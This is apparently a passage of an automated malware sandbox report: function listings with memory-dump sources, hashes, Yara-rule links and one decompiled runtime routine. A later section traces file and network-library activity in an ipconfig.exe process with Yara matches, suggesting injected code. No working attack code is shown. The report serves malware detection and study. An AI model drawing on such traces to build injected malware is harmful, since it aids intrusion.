                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9610, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 94f43408fe5965df992929eb9dced686c0c180bea9333218d8d8be03b8dffe9b
                                                                          • Instruction ID: 0bf14fc77f2cd929b3509b65afa5e9567a3759b6f2b7f71e05c432739bf7a938
                                                                          • Opcode Fuzzy Hash: 94f43408fe5965df992929eb9dced686c0c180bea9333218d8d8be03b8dffe9b
                                                                          • Instruction Fuzzy Hash: 5490027165500802D25071594414746100697D0341F55C022A0015664E87968A55B6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9770, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 634e94668463010734bfe8da8b04c0c2ffab14d414947a8db212e1e064840830
                                                                          • Instruction ID: 80115a289a734030c612a3f4ba5e21440fd1fdb9c1fe15b140dea71b1dc0aa8f
                                                                          • Opcode Fuzzy Hash: 634e94668463010734bfe8da8b04c0c2ffab14d414947a8db212e1e064840830
                                                                          • Instruction Fuzzy Hash: 8790026125504442D20065595408A06100697D0345F55D022A10555A5EC6768851F171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FCA770, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c4e19fefc4fe9789cd91f5d6a835deeba4ae69a58b92f6735e06f4f393568dea
                                                                          • Instruction ID: b41266008859c821928ad6cf04343a9b4de6a6ee779817618d876de256dab660
                                                                          • Opcode Fuzzy Hash: c4e19fefc4fe9789cd91f5d6a835deeba4ae69a58b92f6735e06f4f393568dea
                                                                          • Instruction Fuzzy Hash: 1190027525504442D60065595804A87100697D0345F55D422A04155ACE86958861F161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9760, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 607876f2c00f71055f0a5132834cc857e8ea22d114fb7a5d5422ed4aad445c8e
                                                                          • Instruction ID: 7418cfc0b222d4a79d1ae63e98bf833cd430507688936115022e20f8722fa1a5
                                                                          • Opcode Fuzzy Hash: 607876f2c00f71055f0a5132834cc857e8ea22d114fb7a5d5422ed4aad445c8e
                                                                          • Instruction Fuzzy Hash: 3590027125100403D20061595508707100697D0341F55D422A0415568ED6978851B161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9730, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d0ae7f12fb92a9f88006d7a3c17229903fa18e00fcb3b3efeef43c2482e43456
                                                                          • Instruction ID: 02d46e07147570b5b3fa091a472dbc8ad5ab3affe7fc5daa17ebd5ef96979154
                                                                          • Opcode Fuzzy Hash: d0ae7f12fb92a9f88006d7a3c17229903fa18e00fcb3b3efeef43c2482e43456
                                                                          • Instruction Fuzzy Hash: AC90026165500402D24071595418706101697D0341F55D022A0015564EC69A8A55B6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FCA710, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1bf964d71bc523cb660c4d173b7d2104bbfe59ea0d16696d34fe9607e3fe176f
                                                                          • Instruction ID: 21f10b9ba558c6d7928cb08a1dd4b18e5e7485395937aa29deb78581fc713e75
                                                                          • Opcode Fuzzy Hash: 1bf964d71bc523cb660c4d173b7d2104bbfe59ea0d16696d34fe9607e3fe176f
                                                                          • Instruction Fuzzy Hash: A2900271351000529600A6995804A4A510697F0341F55D026A4005564D85958861B161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9670, Relevance: .0, Instructions: 2COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: 738585d96abefbc09f3813bbadf0473ea69c767eac19d12fd96370b1194f6e18
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0101FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E0101FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00FCCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01015720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01015720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                          0x0101fdda
                                                                          0x0101fde2
                                                                          0x0101fde5
                                                                          0x0101fdec
                                                                          0x0101fdfa
                                                                          0x0101fdff
                                                                          0x0101fe0a
                                                                          0x0101fe0f
                                                                          0x0101fe17
                                                                          0x0101fe1e
                                                                          0x0101fe19
                                                                          0x0101fe19
                                                                          0x0101fe19
                                                                          0x0101fe20
                                                                          0x0101fe21
                                                                          0x0101fe22
                                                                          0x0101fe25
                                                                          0x0101fe40

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0101FDFA
                                                                          Strings
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0101FE2B
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0101FE01
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: 6638e4d3d62e7c618ff7a46626a960fa214c3829e6fbcba2bafcf794c48f3f95
                                                                          • Instruction ID: 5541b7ed90b13d2f17ec568cdbdeb19868b11f9ba1d055223e7128ca66532430
                                                                          • Opcode Fuzzy Hash: 6638e4d3d62e7c618ff7a46626a960fa214c3829e6fbcba2bafcf794c48f3f95
                                                                          • Instruction Fuzzy Hash: 27F0F632200202BFE6211A49DC02F63BF9BEB85B30F144315F6685A1D1DA62F86096F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: ipconfig.exe PID: 6420 Parent PID: 3292 ipconfig.exeCOMMON

                                                                          Executed Functions

                                                                          Function 02B17BA0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02B13587,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B13587,007A002E,00000000,00000060,00000000,00000000), ref: 02B17BED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID: .z`
                                                                          • API String ID: 823142352-1441809116
                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction ID: 6363c58e79aea6cf45b743afad7dc411e79c515ff4e8364bfd12c4908ea2cb1e
                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction Fuzzy Hash: 70F0B2B2210208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B17C4C, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtReadFile.NTDLL(02B13742,5EB6D251,FFFFFFFF,02B13401,?,?,02B13742,?,02B13401,FFFFFFFF,5EB6D251,02B13742,?,00000000), ref: 02B17C95
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 689fed5b608335febc4338a9ae75b9cb7abb815d0f2c3dc977a7c330a000176b
                                                                          • Instruction ID: b04ece7960ff9538acded5a665014e095ba6f776d87873d06124bd9ff231b719
                                                                          • Opcode Fuzzy Hash: 689fed5b608335febc4338a9ae75b9cb7abb815d0f2c3dc977a7c330a000176b
                                                                          • Instruction Fuzzy Hash: 1EF0F4B2210108ABCB08DF89DC80EEB77AAAF8C714F058248BE1D97241C634E8158BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B17C50, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtReadFile.NTDLL(02B13742,5EB6D251,FFFFFFFF,02B13401,?,?,02B13742,?,02B13401,FFFFFFFF,5EB6D251,02B13742,?,00000000), ref: 02B17C95
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                          • Instruction ID: 9f1fb69f4ba023f80ac76232fc08df266be869ea6f096866f3d7563376881f20
                                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                          • Instruction Fuzzy Hash: 8EF0A4B6210208ABDB14DF89DC80EEB77ADAF8C754F158648BA1D97241D630E8118BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B17CCA, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtClose.NTDLL(02B13720,?,?,02B13720,00000000,FFFFFFFF), ref: 02B17CF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 5ed8816de2b6f2e9742c65977b0b7fa730eec64692d6e93a1af3d556b455f4b5
                                                                          • Instruction ID: 7851734c04d241aeda6d0dba2d87fab7110c273baff008505574c994ec7f69ad
                                                                          • Opcode Fuzzy Hash: 5ed8816de2b6f2e9742c65977b0b7fa730eec64692d6e93a1af3d556b455f4b5
                                                                          • Instruction Fuzzy Hash: 7CE01276210214BBE710EBD4DC45F9777A9FF44B50F554895BE1C9B242C570E6108BE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B17CD0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtClose.NTDLL(02B13720,?,?,02B13720,00000000,FFFFFFFF), ref: 02B17CF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                          • Instruction ID: 01932a1f34680a6e41d6fc5b8520b6199c792d736cc6f3e7c26e46fe5ec63f83
                                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                          • Instruction Fuzzy Hash: E7D01776200214ABE710EB98CC85EA77BADEF88760F554499BA189B242C530FA008AE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: e366731f17f69118367d0041015ea6ec93a81fcd8c3c88bba98fbd851e87914b
                                                                          • Instruction ID: 0e4d570f08e9d7122a48bdd6be416451c274d9a1263259a32903f6f4c18148e2
                                                                          • Opcode Fuzzy Hash: e366731f17f69118367d0041015ea6ec93a81fcd8c3c88bba98fbd851e87914b
                                                                          • Instruction Fuzzy Hash: 0B90026135180042D30065A98D15F47000997D0343F61D129A0144594CC9568862A561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 248c13a07819fbddd6c75fc15f5a2a3908b9a75dc489c347b2b21c5b2faf5236
                                                                          • Instruction ID: 5f7210fce0fd36e3a2b6e8e16aec01f0b9abe0d4f327e36f16fb840d0dda5dab
                                                                          • Opcode Fuzzy Hash: 248c13a07819fbddd6c75fc15f5a2a3908b9a75dc489c347b2b21c5b2faf5236
                                                                          • Instruction Fuzzy Hash: D190027134100413D21161998A05B47000D97D0281FA1D426A0414598D96978953F161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 218f2bd51880b059a50ac7196074f2ab3b3ccf816f6806ed3c543ec3bf87fd26
                                                                          • Instruction ID: 39b90fd9c1d126ae16a19202d660a8f41f4da117d67e8b7f4ce99c45d0bcd1ae
                                                                          • Opcode Fuzzy Hash: 218f2bd51880b059a50ac7196074f2ab3b3ccf816f6806ed3c543ec3bf87fd26
                                                                          • Instruction Fuzzy Hash: 42900261382041525645B1998905947400AA7E02817A1D026A1404990C85679857E661
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2eac24eeb3ba137c97803395090f738f592b6119139aae8d0046c1277e8a50b6
                                                                          • Instruction ID: 40e1148c31cedfff4203af1bcee1348771c60d60bd3fd31bf815060ee196f574
                                                                          • Opcode Fuzzy Hash: 2eac24eeb3ba137c97803395090f738f592b6119139aae8d0046c1277e8a50b6
                                                                          • Instruction Fuzzy Hash: 379002A138100442D20061998915F470009D7E1341F61D029E1054594D865ACC53B166
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: eafe63aa91cbffab1c0a6d3e184628c0dbcd0aa42d1227e57bfe104691229fdc
                                                                          • Instruction ID: 418fd4a3f6017fc6f2b58326124a00b1c1edfb9c9e3810a673450060006ccb13
                                                                          • Opcode Fuzzy Hash: eafe63aa91cbffab1c0a6d3e184628c0dbcd0aa42d1227e57bfe104691229fdc
                                                                          • Instruction Fuzzy Hash: 9C9002B134100402D24071998905B87000997D0341F61D025A5054594E869A8DD6B6A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 68c79a903c42bb4044f24e0230c793e640ba1785dee266f4d69b0877cc83f309
                                                                          • Instruction ID: 2fab26b6b807fbbc6f4e80ba26e98453ea0731370624f60c6053641a4770b7ae
                                                                          • Opcode Fuzzy Hash: 68c79a903c42bb4044f24e0230c793e640ba1785dee266f4d69b0877cc83f309
                                                                          • Instruction Fuzzy Hash: FE90027134108802D2106199C905B8B000997D0341F65D425A4414698D86D68892B161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6331c67a5fb084c677b4042e6ec09dcaf85fa3f467e95f45f1292eaaa3a9e2eb
                                                                          • Instruction ID: 4217d0386b843f608e98c62806173d02358be61a9be08a1154b73bfcf83250a1
                                                                          • Opcode Fuzzy Hash: 6331c67a5fb084c677b4042e6ec09dcaf85fa3f467e95f45f1292eaaa3a9e2eb
                                                                          • Instruction Fuzzy Hash: 4190027134100842D20061998905F87000997E0341F61D02AA0114694D8656C852B561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: e519d9a6767aa9ca10fe5a0b5a8954d75ef4a1a96505d6bd9457c7d155407348
                                                                          • Instruction ID: 61a833f875d32742f6536b9c349a21891c44e13c14d0cb60c223003d3125c93d
                                                                          • Opcode Fuzzy Hash: e519d9a6767aa9ca10fe5a0b5a8954d75ef4a1a96505d6bd9457c7d155407348
                                                                          • Instruction Fuzzy Hash: 3A90027135114402D2106199C905B47000997D1241F61D425A0814598D86D68892B162
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: dccbb1bca3d7a4b4067599116287c3e3f51a398402c7c7cb15ab783ee4568df7
                                                                          • Instruction ID: 1f7209fa0f0b8ec41ece939f261ab1e70131b94d5deaafcac15c43cd23f42f9c
                                                                          • Opcode Fuzzy Hash: dccbb1bca3d7a4b4067599116287c3e3f51a398402c7c7cb15ab783ee4568df7
                                                                          • Instruction Fuzzy Hash: 2590026935300002D28071999909A4B000997D1242FA1E429A0005598CC956886AA361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 045a6695fe03e0eb2142cce316671aea7cb696f38b67a0f594a44c0c9d75436d
                                                                          • Instruction ID: 2c199883139ba33224e88cb0a66773395c64a06f6520b19af68ff9ed7c261496
                                                                          • Opcode Fuzzy Hash: 045a6695fe03e0eb2142cce316671aea7cb696f38b67a0f594a44c0c9d75436d
                                                                          • Instruction Fuzzy Hash: 1790027134100402D20065D99909A87000997E0341F61E025A5014595EC6A68892B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a28deb4f61add599be1ee04c79112025db814e2ec98a44ce56badce279739030
                                                                          • Instruction ID: 80a77df74f3e0bb5f8c9594c3858f2985b13a2603ed869e453f9161a683f19dc
                                                                          • Opcode Fuzzy Hash: a28deb4f61add599be1ee04c79112025db814e2ec98a44ce56badce279739030
                                                                          • Instruction Fuzzy Hash: 0F9002A134200003420571998915A57400E97E0241B61D035E10045D0DC5668892B165
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9d5721d2e22c1efc10a62103293a7e0681094c3bb20906c9ef3d6391fe51303a
                                                                          • Instruction ID: 9baa5ee4d30d0273e6d69478fd8b2ebd6381132c5e9e48f7badea9261de42c6d
                                                                          • Opcode Fuzzy Hash: 9d5721d2e22c1efc10a62103293a7e0681094c3bb20906c9ef3d6391fe51303a
                                                                          • Instruction Fuzzy Hash: F6900265351000030205A5994B05947004A97D5391361D035F1005590CD6628862A161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B168C0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 02B16968
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: bc18748a33a9e030f66fd2e36009c6e9db07ea1429afa165c49bff7f197d6325
                                                                          • Instruction ID: 5f543d35a01cd075a252d7674b2b98b2b25de35ee19469cb66127d6e7ab58169
                                                                          • Opcode Fuzzy Hash: bc18748a33a9e030f66fd2e36009c6e9db07ea1429afa165c49bff7f197d6325
                                                                          • Instruction Fuzzy Hash: 4C319CB5600744ABC714DF64C884FABB7B9EF88700F4080ADE62A9B244DB70B450CFE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B168B6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 02B16968
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
